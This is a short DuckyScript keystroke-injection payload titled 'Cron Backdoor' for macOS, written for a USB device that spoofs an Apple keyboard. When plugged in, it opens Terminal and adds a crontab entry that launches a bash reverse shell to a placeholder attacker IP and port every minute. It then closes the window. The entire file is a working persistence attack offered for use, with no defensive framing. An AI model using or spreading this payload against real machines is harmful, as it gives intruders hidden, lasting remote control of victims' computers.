REM Author: Generated
REM Title: Cron Backdoor
REM Target: macOS
REM Version: 1.0
REM Category: Persistence
REM ---
DELAY 1000
REM Add reverse shell to crontab
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING crontab -l > /tmp/cron_backup 2>/dev/null || echo '' > /tmp/cron_backup
ENTER
DELAY 500
STRING echo '* * * * * /bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' >> /tmp/cron_backup
ENTER
DELAY 500
STRING crontab /tmp/cron_backup
ENTER
DELAY 500
STRING crontab -l
ENTER
DELAY 500
GUI w
